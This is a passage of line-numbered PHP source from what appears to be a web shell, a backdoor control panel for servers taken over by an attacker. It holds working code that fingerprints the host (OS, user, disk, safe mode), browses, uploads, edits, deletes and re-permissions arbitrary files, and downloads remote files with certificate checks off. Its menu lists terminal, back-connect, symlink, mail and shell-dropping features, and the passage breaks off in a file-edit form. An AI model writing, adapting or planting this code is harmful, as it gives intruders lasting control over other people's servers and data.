591 return "R.I.P Command";
592}
593
594function Remove($x)
595{
596 if(is_dir($x))
597 {
598 if($h=@opendir($x))
599 {
600 while(false!==($f=readdir($h)))
601 {
602 if($f!="."&&$f!="..")
603 {
604 Remove($x._.$f);
605 }
606 }
607 closedir($h);
608 }
609 return rmdir($x);
610 }
611 elseif(is_file($x))
612 {
613 return unlink($x);
614 }
615 return false;
616}
617
618function ChmodRecursive($x,$y)
619{
620 if(is_dir($x))
621 {
622 if($h=@opendir($x))
623 {
624 while(false!==($f=readdir($h)))
625 {
626 if($f!="."&&$f!="..")
627 {
628 ChmodRecursive($x._.$f);
629 }
630 }
631 closedir($h);
632 }
633 return chmod($x,$y);
634 }
635 elseif(is_file($x))
636 {
637 return chmod($x,$y);
638 }
639 return false;
640}
641
642function CopyRecursive($x,$y)
643{
644 if(is_dir($x))
645 {
646 @mkdir($y);
647 if($h=@opendir($x))
648 {
649 while(false!==($f=readdir($h)))
650 {
651 if($f!="."&&$f!="..")
652 {
653 CopyRecursive($x._.$f,$y._.$f);
654 }
655 }
656 closedir($h);
657 }
658 return true;
659 }
660 elseif(is_file($x))
661 {
662 return copy($x,$y);
663 }
664 return false;
665}
666
667function MoveRecursive($x,$y)
668{
669 if(is_dir($x))
670 {
671 @mkdir($y);
672 if($h=@opendir($x))
673 {
674 while(false!==($f=readdir($h)))
675 {
676 if($f!="."&&$f!="..")
677 {
678 MoveRecursive($x._.$f,$y._.$f);
679 }
680 }
681 closedir($h);
682 }
683 return Remove($x);
684 }
685 elseif(is_file($x))
686 {
687 if(copy($x,$y))
688 {
689 return unlink($x);
690 }
691 }
692 return false;
693}
694
695function GetDownloadUrl($x,$y)
696{
697 global $agent;
698 $fl=fopen($y,"w");
699 $ch=curl_init();
700 curl_setopt($ch,CURLOPT_USERAGENT,$agent);
701 curl_setopt($ch,CURLOPT_URL,$x);
702 curl_setopt($ch,CURLOPT_FILE,$fl);
703 curl_setopt($ch,CURLOPT_HEADER,0);
704 curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
705 curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
706 curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
707 $rs=curl_exec($ch);
708 if(curl_error($ch)) return curl_error($ch);
709 curl_close($ch);
710 fclose($fl);
711 return true;
712}
713
714function GetUrlExists($x)
715{
716 global $agent;
717 $ch=curl_init();
718 curl_setopt($ch,CURLOPT_USERAGENT,$agent);
719 curl_setopt($ch,CURLOPT_URL,$x);
720 curl_setopt($ch,CURLOPT_TIMEOUT,5);
721 curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);
722 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
723 $rs=curl_exec($ch);
724 $http=curl_getinfo($ch,CURLINFO_HTTP_CODE);
725 if(curl_error($ch)) return curl_error($ch);
726 curl_close($ch);
727 return ($http>=200 && $http<300);
728}
729
730function GetUrlContent($x)
731{
732 global $agent;
733 $ch=curl_init();
734 curl_setopt($ch,CURLOPT_USERAGENT,$agent);
735 curl_setopt($ch,CURLOPT_URL,$x);
736 curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
737 curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
738 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
739 $rs=curl_exec($ch);
740 if(curl_error($ch)) return curl_error($ch);
741 curl_close($ch);
742 return $rs;
743}
744
745function GetUrlFromPath($x)
746{
747 $fix_path=str_replace(_,'/',$x);
748 $protocol=empty($_SERVER['HTTPS'])||$_SERVER['HTTPS']==='off'?'http://':'https://';
749 $path=str_replace(document_root,'',$fix_path);
750 return $protocol.server_name.$path;
751}
752
753function PostUrlContent($url,$content)
754{
755 global $agent;
756 $params=array(
757 'http' => array(
758 'method' => "POST",
759 'header' => "Content-Type: application/x-www-form-urlencoded\r\n".
760 "User-Agent: $agent\r\n",
761 'content' => http_build_query($content)
762 )
763 );
764 $results="";
765 $context=stream_context_create($params);
766 $header=get_headers($url);
767 if($http=substr($header[0],9,3) != "200")
768 {
769 $results="Error: $http";
770 }
771 else
772 {
773 //file_get_contents
774 if($contents=file_get_contents($url,null,$context))
775 {
776 $results=htmlspecialchars($contents);
777 }
778
779 //stream_get_contents
780 if($handle=fopen($url,'r',false,$context))
781 {
782 $contents=stream_get_contents($handle);
783 fclose($handle);
784 $results=htmlspecialchars($contents);
785 }
786
787 //fopen
788 if($handle=fopen($url,'r',false,$context))
789 {
790 $contents="";
791 while(!feof($handle))
792 {
793 $contents.=fread($handle,10240);
794 }
795 fclose($handle);
796 $results=htmlspecialchars($contents);
797 }
798
799 }
800 return $results;
801}
802
803function GetFileType($x)
804{
805 if(is_file($x))
806 {
807 return pathinfo($x)['extension'];
808 }
809 elseif(is_dir($x))
810 {
811 return "dir";
812 }
813 elseif(is_link($x))
814 {
815 return "link";
816 }
817 else
818 {
819 return "-";
820 }
821}
822
823function GetFileTime($x,$y)
824{
825 switch($y)
826 {
827 case "create":return date("Y-m-d H:i:s",@filectime($x));break;
828 case "modify":return date("Y-m-d H:i:s",@filemtime($x));break;
829 case "access":return date("Y-m-d H:i:s",@fileatime($x));break;
830 }
831}
832
833function GetFilePerm($x)
834{
835 $perms=@fileperms($x);
836 switch ($perms & 0xF000)
837 {case 0xC000:$info='s';break;case 0xA000:$info='l';break;
838 case 0x8000:$info='r';break;case 0x6000:$info='b';break;
839 case 0x4000:$info='d';break;case 0x2000:$info='c';break;
840 case 0x1000:$info='p';break;default:$info='u';}
841 $info .=(($perms & 0x0100)?'r':'-');$info .=(($perms & 0x0080)?'w':'-');
842 $info .=(($perms & 0x0040)?(($perms & 0x0800)?'s':'x' ):(($perms & 0x0800)?'S':'-'));
843 $info .=(($perms & 0x0020)?'r':'-');$info .=(($perms & 0x0010)?'w':'-');
844 $info .=(($perms & 0x0008)?(($perms & 0x0400)?'s':'x' ):(($perms & 0x0400)?'S':'-'));
845 $info .=(($perms & 0x0004)?'r':'-');$info .=(($perms & 0x0002)?'w':'-');
846 $info .=(($perms & 0x0001)?(($perms & 0x0200)?'t':'x' ):(($perms & 0x0200)?'T':'-'));
847 return sprintf('%s [%s]',$info,substr(decoct($perms),2));
848}
849
850function GetFileSize($x)
851{
852 $x=abs($x);
853 $size=array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
854 $exp=$x?floor(log($x)/log(1024)):0;
855 return sprintf('%.2f '.$size[$exp],($x/pow(1024,floor($exp))));
856}
857
858function GetUser($x)
859{
860 if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
861 {
862 $uid=posix_getpwuid(posix_getuid());
863 $gid=posix_getgrgid(posix_getgid());
864
865 switch($x)
866 {
867 case 'usr':return $uid['name'];break;
868 case 'uid':return $uid['uid'];break;
869 case 'grp':return $gid['name'];break;
870 case 'gid':return $gid['gid'];break;
871 }
872 }
873 else
874 {
875 switch($x)
876 {
877 case 'usr':return get_current_user();break;
878 case 'uid':return getmyuid();break;
879 case 'grp':return "?";break;
880 case 'gid':return getmygid();break;
881 }
882 }
883}
884
885function GetOwnerGroup($x)
886{
887 if(Unix())
888 {
889 if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
890 {
891 $user=posix_getpwuid(fileowner($x));
892 $group=posix_getgrgid(filegroup($x));
893 return sprintf('%s:%s',$user['name'],$group['name']);
894 }
895 }
896 return "?:?";
897}
898
899function GetFileOwnerGroup($x)
900{
901 if(Unix())
902 {
903 if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
904 {
905 $user=posix_getpwuid(fileowner($x));
906 $group=posix_getgrgid(filegroup($x));
907 return sprintf('%s:%s/%s:%s',$user['name'],$user['uid'],$group['name'],$group['gid']);
908 }
909 }
910 return "?:?/?:?";
911}
912
913function GetSafeMode()
914{
915 if(strtolower(ini_get("safe_mode"))=='on')
916 {
917 $safemod="<font class='off'>ON</font>";
918 }
919 else
920 {
921 $safemod="<font class='on'>OFF</font>";
922 }
923 return $safemod;
924}
925
926function MapDirectory($x)
927{
928 $map="";
929 $d=str_replace("\\",_,$x);
930 if(empty($d))
931 {
932 $d=realpath(".");
933 }
934 elseif(realpath($d))
935 {
936 $d=realpath($d);
937 }
938 $d=str_replace("\\",_,$d);
939 if(substr($d,-1)!=_)
940 {
941 $d.=_;
942 }
943 $d=str_replace("\\\\","\\",$d);
944 $pd=$e=explode(_,substr($d,0,-1));
945 $i=0;
946 foreach($pd as $b)
947 {
948 $t="";
949 $j=0;
950 foreach($e as $r)
951 {
952 $t.=$r._;
953 if($j==$i)
954 {
955 break;
956 }
957 $j++;
958 }
959 $map.="<a href=\"?d=".urle($t)."\" >".htmlspecialchars($b)."</a>"._;
960 $i++;
961 }
962 return rtrim($map,_);
963}
964
965function MapDrive($x)
966{
967 if(!Unix())
968 {
969 $v=explode("\\",$x);
970 $v=$v[0];
971 $l="";
972 foreach(range("A","Z") as $lt)
973 {
974 $drive=is_dir($lt.":\\");
975 if($drive)
976 {
977 $l.="<a href=\"?d=".urle($lt.":\\")."\">[";
978 if(strtolower($lt.':')!=strtolower($v))
979 {
980 $l.=$lt;
981 }
982 else
983 {
984 $l.="<font color=\"orange\"><b>".$lt."</b></font>";
985 }
986 $l.="]</a>";
987 }
988 }
989 return $l;
990 }
991}
992
993function MainMenu()
994{
995 $menu=array(
996 "ExpL" => "?d=".urle(getcwd()),
997 "★ Sec." => "?x=secure",
998 "Info" => "?x=info",
999 "Database" => "?x=db",
1000 "Terminal" => "?x=terminal",
1001 "Connect" => "?x=connect",
1002 ".Htaccess" => "?x=htaccess",
1003 "PHP" => "?x=php",
1004 "Perl/CGI" => "?x=perl",
1005 "Mail" => "?x=mail",
1006 "Process" => "?x=process",
1007 "Shells" => "?x=shells",
1008 "Symlink" => "?x=symlink",
1009 "♛ Tools" => "?z",
1010 "Account" => "?x=account",
1011 "Update" => "?x=update",
1012 "Logout" => "?x=logout"
1013 );
1014 $nu="";
1015 foreach($menu as $key => $val)
1016 {
1017 $idxkey=substr($val,1,1);
1018 $idxval=substr($val,3);
1019 $active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":"";
1020 if($key=="Logout")
1021 {
1022 $nu.="<li><a ".$active." href='".$val."' onclick=\"return confirm('Bye !');\">".$key."</a></li>";
1023 }
1024 else
1025 {
1026 $nu.="<li><a ".$active." href='".$val."'>".$key."</a></li>";
1027 }
1028 }
1029 return $nu;
1030}
1031
1032function MenuTools($x)
1033{
1034 global $menu_tools;
1035 $ol="<div class='menu-tools'><ul>";
1036 $menu_tools=$x;
1037
1038 foreach($menu_tools as $k => $v)
1039 {
1040 $active=$_REQUEST['z']==$k?"class='active'":"";
1041 $ol.="<li><a ".$active." href='?z=".$k."'>[".$v['title']."]</a></li>";
1042 }
1043 $ol.="</ul></div>";
1044 return $ol;
1045}
1046
1047printf("<div id='header'>
1048 <div class='header-left'>
1049 <div id='info'>
1050 <font class='on'>[%s]</font><br>
1051 <font class='on'>[%s]</font><br>
1052 [<a href='//%s' target='_blank'>%s</a>]: <font class='on'>%s:%s</font> [%s]: <font class='on'>%s:%s</font><br>
1053 [USER]: <font class='on'>%s(%s)</font> [GROUP]: <font class='on'>%s(%s)</font><br>
1054 [HDD]: <font class='on'>%s</font> / <font class='on'>%s</font><br>
1055 [PHPMODE]: <font class='on'>%s</font><br>
1056 [SAFEMODE]: <font class='on'>%s</font><br>
1057 </div>
1058 </div>
1059 <div class='header-right'>
1060 <a href='%s'><div id='logo'>
1061 <h1 id='title'>%s</h1>
1062 <div class='line'></div>
1063 <h2 id='subtitle'>%s</h2>
1064 </div></a>
1065 </div>
1066 <div class='clr'></div>
1067 </div>
1068 <div id='container'>
1069 <div class='menu'>
1070 <ul>%s</ul>
1071 </div>
1072 <div class='menu-directory'>
1073 <div class='map-switch'>
1074 <input type='submit' name='map-switch' value='♞' onclick='mapSwitch(\"map1\",\"map2\")'>
1075 </div>
1076 <div class='map1' id='map1' style='display:inline-block'>
1077 <span style='margin-right:5px'>%s</span>
1078 <span style='margin-right:5px'>%s</span>
1079 </div>
1080 <div class='map2' id='map2' style='display:none'>
1081 <form method='post' id='map2-form' onsubmit='document.getElementById(\"map2-form\").action=\"?g=\" + encodeURI(document.getElementById(\"map2-input\").value);'>
1082 <input type='text' value='%s' id='map2-input'/>
1083 <input type='submit' value='Go'>
1084 </form>
1085 </div>
1086 </div>
1087 <div class='content'>",
1088 php_uname(),server_software,
1089 server_name,server_name,gethostbyname(http_host),server_port,
1090 B64D($account[0]),remote_addr,remote_port,
1091 GetUser("usr"),GetUser("uid"),GetUser("grp"),GetUser("gid"),
1092 GetFileSize(@disk_free_space($dir)),GetFileSize(@disk_total_space($dir)),
1093 php_sapi_name(),GetSafeMode(),php_self,$config['title'],$config['subtitle'],
1094 MainMenu(),MapDrive($map),MapDirectory($map),$map
1095);
1096
1097if(any("g",$_REQUEST))
1098{
1099 $g=$_REQUEST['g'];
1100
1101 if (is_dir($g))
1102 {
1103 header('location:'.php_self.'?d='.urle($g));
1104 }
1105 elseif(is_file($g)||is_link($g))
1106 {
1107 header('location:'.php_self.'?a=v&r='.urle($g));
1108 }
1109 else
1110 {
1111 header('location:'.php_self);
1112 }
1113}
1114
1115if(any("d",$_REQUEST)||request_uri===script_name)
1116{
1117 $_SESSION['c']=urle($dir);
1118
1119 if(any("file",$_REQUEST)&&$_REQUEST['file']=="New File")
1120 {
1121 $file=trim($dir._.$_REQUEST['what']);
1122
1123 if(file_exists($file))
1124 {
1125 printf("<center style='margin-bottom:10px'><b class='off'>Can't create New File!</b></center>");
1126 }
1127 else
1128 {
1129 $mf=@fopen($file,"w");
1130 fclose($mf);
1131 header("location:".php_self."?a=e&r=".urle($file));
1132 }
1133 }
1134 if(any("directory",$_REQUEST)&&$_REQUEST['directory']=="New Dir")
1135 {
1136 $dire=trim($_REQUEST['what']);
1137
1138 @chdir($dir);
1139
1140 if(!@mkdir($dire))
1141 {
1142 printf("<center style='margin-bottom:10px'><b class='off'>Can't create New Directory!</b></center>");
1143 }
1144 else
1145 {
1146 printf("<center style='margin-bottom:10px'><b class='on'>Directory '%s' Created on %s</b></center>",$dire,GetFileTime($dir._.$dire,'create'));
1147 }
1148 }
1149 if(any("upload",$_REQUEST)&&$_REQUEST['upload']=="Upload")
1150 {
1151 $upload=$dir._.trim(basename($_FILES["what"]["name"]));
1152
1153 if(move_uploaded_file($_FILES["what"]["tmp_name"],$upload))
1154 {
1155 printf("<center style='margin-bottom:10px'><b class='on'>File %s has been uploaded</b></center>",basename($_FILES["what"]["name"]));
1156 }
1157 else
1158 {
1159 printf("<center style='margin-bottom:10px'><b class='off'>✕ Can't upload new file! ✕</b></center>");
1160 }
1161 }
1162 if($handle=@opendir($dir))
1163 {
1164 $reads=array();
1165 $count_dirs=0;
1166 $count_files=0;
1167
1168 while(false!==($file=readdir($handle)))
1169 {
1170 $filedir=rtrim($dir,_)._.$file;
1171 $updir=substr($dir,0,strrpos($dir,_));
1172 if (strlen($updir)<=2) $updir=$updir._;
1173 $type=GetFileType($filedir);
1174 $size=GetFileSize(@filesize($filedir));
1175 $last=GetFileTime($filedir,"modify");
1176 $perm=GetFilePerm($filedir);
1177 $owner=GetOwnerGroup($filedir);
1178 $mime=@mime_content_type($filedir);
1179 $view="";
1180
1181 if(strpos($mime,'image')!==false)
1182 {
1183 $view="?a=v&w=i&r=".urle($filedir);
1184 }
1185 elseif(strpos($mime,'video')!==false)
1186 {
1187 $view="?a=v&w=v&r=".urle($filedir);
1188 }
1189 elseif(strpos($mime,'audio')!==false)
1190 {
1191 $view="?a=v&w=a&r=".urle($filedir);
1192 }
1193 else
1194 {
1195 $view="?a=v&r=".urle($filedir);
1196 }
1197
1198 if($file==".")
1199 {
1200 $reads[]="<tr sorttable_customkey='2'><td><center><input type='checkbox' name='nochk[]' value='".urle($dir)."'/></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAd5JREFUeNqMU79rFUEQ/vbuodFEEkzAImBpkUabFP4ldpaJhZXYm/RiZWsv/hkWFglBUyTIgyAIIfgIRjHv3r39MePM7N3LcbxAFvZ2b2bn22/mm3XMjF+HL3YW7q28YSIw8mBKoBihhhgCsoORot9d3/ywg3YowMXwNde/PzGnk2vn6PitrT+/PGeNaecg4+qNY3D43vy16A5wDDd4Aqg/ngmrjl/GoN0U5V1QquHQG3q+TPDVhVwyBffcmQGJmSVfyZk7R3SngI4JKfwDJ2+05zIg8gbiereTZRHhJ5KCMOwDFLjhoBTn2g0ghagfKeIYJDPFyibJVBtTREwq60SpYvh5++PpwatHsxSm9QRLSQpEVSd7/TYJUb49TX7gztpjjEffnoVw66+Ytovs14Yp7HaKmUXeX9rKUoMoLNW3srqI5fWn8JejrVkK0QcrkFLOgS39yoKUQe292WJ1guUHG8K2o8K00oO1BTvXoW4yasclUTgZYJY9aFNfAThX5CZRmczAV52oAPoupHhWRIUUAOoyUIlYVaAa/VbLbyiZUiyFbjQFNwiZQSGl4IDy9sO5Wrty0QLKhdZPxmgGcDo8ejn+c/6eiK9poz15Kw7Dr/vN/z6W7q++091/AQYA5mZ8GYJ9K0AAAAAASUVORK5CYII='/> <a title='Current Directory' href='?d=".urle($dir)."'>.</a></td><td><center>".strtoupper($type)."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=x&r=".urle($dir)."' onclick=\"return confirm('Delete Directory [ /".basename($dir)." ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=".urle($dir)."' title='Modify Folder'>ℳ</a></td></tr>";
1201 }
1202 elseif($file=="..")
1203 {
1204 $reads[]="<tr sorttable_customkey='1'><td><center><input type='checkbox' name='nochk[]' value='".urle($updir)."'/></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAmlJREFUeNpsU0toU0EUPfPysx/tTxuDH9SCWhUDooIbd7oRUUTMouqi2iIoCO6lceHWhegy4EJFinWjrlQUpVm0IIoFpVDEIthm0dpikpf3ZuZ6Z94nrXhhMjM3c8895977BBHB2PznK8WPtDgyWH5q77cPH8PpdXuhpQT4ifR9u5sfJb1bmw6VivahATDrxcRZ2njfoaMv+2j7mLDn93MPiNRMvGbL18L9IpF8h9/TN+EYkMffSiOXJ5+hkD+PdqcLpICWHOHc2CC+LEyA/K+cKQMnlQHJX8wqYG3MAJy88Wa4OLDvEqAEOpJd0LxHIMdHBziowSwVlF8D6QaicK01krw/JynwcKoEwZczewroTvZirlKJs5CqQ5CG8pb57FnJUA0LYCXMX5fibd+p8LWDDemcPZbzQyjvH+Ki1TlIciElA7ghwLKV4kRZstt2sANWRjYTAGzuP2hXZFpJ/GsxgGJ0ox1aoFWsDXyyxqCs26+ydmagFN/rRjymJ1898bzGzmQE0HCZpmk5A0RFIv8Pn0WYPsiu6t/Rsj6PauVTwffTSzGAGZhUG2F06hEc9ibS7OPMNp6ErYFlKavo7MkhmTqCxZ/jwzGA9Hx82H2BZSw1NTN9Gx8ycHkajU/7M+jInsDC7DiaEmo1bNl1AMr9ASFgqVu9MCTIzoGUimXVAnnaN0PdBBDCCYbEtMk6wkpQwIG0sn0PQIUF4GsTwLSIFKNqF6DVrQq+IWVrQDxAYQC/1SsYOI4pOxKZrfifiUSbDUisif7XlpGIPufXd/uvdvZm760M0no1FZcnrzUdjw7au3vu/BVgAFLXeuTxhTXVAAAAAElFTkSuQmCC'/> <a title='Parent Directory' href='?d=".urle($updir)."'>".$file."</a></td><td><center>".strtoupper($type)."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=x&r=".urle($updir)."' onclick=\"return confirm('Delete Directory [ /".basename($updir)." ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=".urle($updir)."' title='Modify Folder'>ℳ</a></td></tr>";
1205 }
1206 else
1207 {
1208 if($type=="dir")
1209 {
1210 $reads[]="<tr sorttable_customkey='3'><td><center><input type='checkbox' name='chk[]' value='".urle($filedir)."' /></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAd5JREFUeNqMU79rFUEQ/vbuodFEEkzAImBpkUabFP4ldpaJhZXYm/RiZWsv/hkWFglBUyTIgyAIIfgIRjHv3r39MePM7N3LcbxAFvZ2b2bn22/mm3XMjF+HL3YW7q28YSIw8mBKoBihhhgCsoORot9d3/ywg3YowMXwNde/PzGnk2vn6PitrT+/PGeNaecg4+qNY3D43vy16A5wDDd4Aqg/ngmrjl/GoN0U5V1QquHQG3q+TPDVhVwyBffcmQGJmSVfyZk7R3SngI4JKfwDJ2+05zIg8gbiereTZRHhJ5KCMOwDFLjhoBTn2g0ghagfKeIYJDPFyibJVBtTREwq60SpYvh5++PpwatHsxSm9QRLSQpEVSd7/TYJUb49TX7gztpjjEffnoVw66+Ytovs14Yp7HaKmUXeX9rKUoMoLNW3srqI5fWn8JejrVkK0QcrkFLOgS39yoKUQe292WJ1guUHG8K2o8K00oO1BTvXoW4yasclUTgZYJY9aFNfAThX5CZRmczAV52oAPoupHhWRIUUAOoyUIlYVaAa/VbLbyiZUiyFbjQFNwiZQSGl4IDy9sO5Wrty0QLKhdZPxmgGcDo8ejn+c/6eiK9poz15Kw7Dr/vN/z6W7q++091/AQYA5mZ8GYJ9K0AAAAAASUVORK5CYII='/> <a title='Open Directory' href='?d=".urle($filedir)."'>".$file."</a></td><td><center>".strtoupper($type)."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=x&r=".urle($filedir)."' onclick=\"return confirm('Delete Directory [ /".basename($filedir)." ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=".urle($filedir)."' title='Modify Folder'>ℳ</a></td></tr>";
1211 $count_dirs++;
1212 }
1213 else
1214 {
1215 $reads[]="<tr sorttable_customkey='4'><td><center><input type='checkbox' name='chk[]' value='".urle($filedir)."' /></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAABnRSTlMAAAAAAABupgeRAAABHUlEQVR42o2RMW7DIBiF3498iHRJD5JKHurL+CRVBp+i2T16tTynF2gO0KSb5ZrBBl4HHDBuK/WXACH4eO9/CAAAbdvijzLGNE1TVZXfZuHg6XCAQESAZXbOKaXO57eiKG6ft9PrKQIkCQqFoIiQFBGlFIB5nvM8t9aOX2Nd18oDzjnPgCDpn/BH4zh2XZdlWVmWiUK4IgCBoFMUz9eP6zRN75cLgEQhcmTQIbl72O0f9865qLAAsURAAgKBJKEtgLXWvyjLuFsThCSstb8rBCaAQhDYWgIZ7myM+TUBjDHrHlZcbMYYk34cN0YSLcgS+wL0fe9TXDMbY33fR2AYBvyQ8L0Gk8MwREBrTfKe4TpTzwhArXWi8HI84h/1DfwI5mhxJamFAAAAAElFTkSuQmCC'> <a title='View File' href='".$view."'>".$file."</a></td><td><center>".strtoupper($type)."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=e&r=".urle($filedir)."' title='Modify File'>ℳ</a> <a class='action' href='?a=x&r=".urle($filedir)."' onclick=\"return confirm('Delete Filename [ ".basename($filedir)." ] ?');\" title='Delete File'>✘</a> <a class='action' href='?a=d&r=".urle($filedir)."' title='Download File'>➥</a></td></tr>";
1216 $count_files++;
1217 }
1218 }
1219 }
1220 sort($reads);
1221 $filesdirs="";
1222 foreach($reads as $read)
1223 {
1224 $filesdirs.=$read;
1225 }
1226 printf("<div id='action'>
1227 <table><tr>
1228 <td><form class='new' method=POST action='?d=%s'>
1229 <input name='what' type='text' /><input type='submit' name='file' value='New File'/>
1230 </form></td>
1231 <td><form class='new' method=POST action='?d=%s'>
1232 <input name='what' type='text' /><input type='submit' name='directory' value='New Dir'/>
1233 </form></td>
1234 <td><form class='new' method=POST action='?x=find'>
1235 <input type='text' name='find-value' id='find-action'/><input type='submit' name='find-button' value='Find'/>
1236 </form></td>
1237 <td><form class='new' method=POST action='?d=%s&x=upload' enctype='multipart/form-data'>
1238 <input name='what' type='file' class='inputfile'/><input type='submit' name='upload' value='Upload'/>
1239 </form></td>
1240 </tr></table>
1241 </div>
1242 <div id='home'>
1243 <form name='files' method=POST action='?x=action' onclick='checkCount(\"count\")'>
1244 <table class='table sortable'>
1245 <thead>
1246 <tr>
1247 <th class='sorttable_nosort'><input type='checkbox' name='check-all' onclick='checkAll()'/></th>
1248 <th class='sorttable_numeric'>Name</th>
1249 <th>Type</th>
1250 <th>Size</th>
1251 <th>Perms</th>
1252 <th>Owner:Group</th>
1253 <th>Modified</th>
1254 <th>Act.</th>
1255 </tr>
1256 </thead>
1257 <tbody>%s</tbody>
1258 <tFoot>
1259 <tr>
1260 <td colspan='8'>[<span id='count'>0</span>] Selected | Dir's: [%s] File's: [%s]</td>
1261 </tr>
1262 </tFoot>
1263 </table>
1264 <select name='action-value'>
1265 <option value='copy'>Copy</option>
1266 <option value='move'>Move</option>
1267 <option value='delete'>Delete</option>
1268 <option value='zip'>Archive (zip)</option>
1269 <option value='unzip'>Extract to (zip)</option>
1270 </select>
1271 <input type='submit' value='Action' name='action-button' />
1272 </form>
1273 </div>",
1274 urle($dir),
1275 urle($dir),
1276 urle($dir),
1277 $filesdirs,
1278 $count_dirs,
1279 $count_files
1280 );
1281 closedir($handle);
1282 }
1283 else
1284 {
1285 print "<center style='margin-bottom:10px'><b class='off'>Can't Open Location</b></center>";
1286 }
1287}
1288
1289if(any("r",$_REQUEST))
1290{
1291 if(file_exists(urld($_REQUEST["r"])))
1292 {
1293 $file=strval(urld($_REQUEST["r"]));
1294 $status=any("status",$_SESSION)?$_SESSION['status']:"";
1295 $back=php_self."?d=".urle($dir);
1296
1297 printf("<div class='divide'>
1298 <div class='divide-left'>
1299 <table class='table'>
1300 <tr><td>Name</td><td>%s</td></tr>
1301 <tr><td>Size</td><td>%s</td></tr>
1302 <tr><td>Permission</td><td>%s</td></tr>
1303 <tr><td>Create time</td><td>%s</td></tr>
1304 <tr><td>Last modified</td><td>%s</td></tr>
1305 <tr><td>Last accessed</td><td>%s</td></tr>
1306 </table>
1307 </div>
1308 <div class='divide-right'>
1309 <table class='table'>
1310 <tr><td>MIME</td><td>%s</td></tr>
1311 <tr><td>Owner/Group</td><td>%s</td></tr>
1312 <tr><td>MD5</td><td>%s</td></tr>
1313 <tr><td>SHA1</td><td>%s</td></tr>
1314 </table>
1315 </div>
1316 </div>",
1317 basename($file),
1318 GetFileSize(@filesize($file)),
1319 GetFilePerm($file),
1320 GetFileTime($file,"create"),
1321 GetFileTime($file,"modify"),
1322 GetFileTime($file,"access"),
1323 mime_content_type($file),
1324 GetFileOwnerGroup($file),
1325 @md5_file($file),
1326 @sha1_file($file)
1327 );
1328
1329 if(is_file($file)||is_link($file))
1330 {
1331 $menu=array(
1332
1333 "Back" => "?a=b&r=",
1334 "Edit" => "?a=e&r=",
1335 "View" => "?a=v&r=",
1336 "Copy" => "?a=cp&r=",
1337 "Move" => "?a=mv&r=",
1338 "Download" => "?a=d&r=",
1339 "Hexdump" => "?a=h&r=",
1340 "Chmod" => "?a=c&r=",
1341 "Chown" => "?a=cwn&r=",
1342 "Chgrp" => "?a=cgp&r=",
1343 "Touch" => "?a=t&r=",
1344 "Rename" => "?a=r&r=",
1345 "Delete" => "?a=x&r="
1346 );
1347 }
1348 elseif(is_dir($file))
1349 {
1350 $menu=array(
1351
1352 "Back" => "?a=b&r=",
1353 "Chmod" => "?a=c&r=",
1354 "Chown" => "?a=cwn&r=",
1355 "Chgrp" => "?a=cgp&r=",
1356 "Touch" => "?a=t&r=",
1357 "Rename" => "?a=r&r=",
1358 "Delete" => "?a=x&r="
1359 );
1360 }
1361
1362 $nu="";
1363
1364 foreach($menu as $key => $val)
1365 {
1366 $idxkey=substr($val,1,1);
1367 $idxval=substr($val,3,strpos($val,'&')-3);
1368 $active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":"";
1369 if($key=="Delete")
1370 {
1371 $nu.="<li><a ".$active." href='".$val.urle($file)."' onclick=\"return confirm('Delete Filename [ ".basename($file)." ] ?');\">".$key."</a></li>";
1372 }
1373 elseif($key=="Back")
1374 {
1375 $nu.="<li><a ".$active." href='".$back."'>".$key."</a></li>";
1376 }
1377 else
1378 {
1379 $nu.="<li><a ".$active." href='".$val.urle($file)."'>".$key."</a></li>";
1380 }
1381 }
1382
1383 printf("<div class='menu'>
1384 <ul>%s</ul>
1385 </div>",$nu);
1386
1387 if($_REQUEST['a']=='e')
1388 {
1389 $source="";
1390
1391 if(filesize($file) > 5242880)
1392 {
1393 $source.="Lazy to Read more than 5MB Files";
1394 }
1395 else
1396 {
1397 $open=fopen($file,'r');
1398
1399 if($open)
1400 {
1401 while(!feof($open))
1402 {
1403 $source.=htmlentities(fread($open,(1024*4)));
1404 }
1405 fclose($open);
1406 }
1407 }
1408
1409 printf("<form class='frmsource' method='post'>
1410 <textarea id='sourcefocus' name='sourcecode' rows='25' cols='100'>%s</textarea>
1411 <input type='Submit' value='Save file' name='save'/>
1412 <label>%s</label>
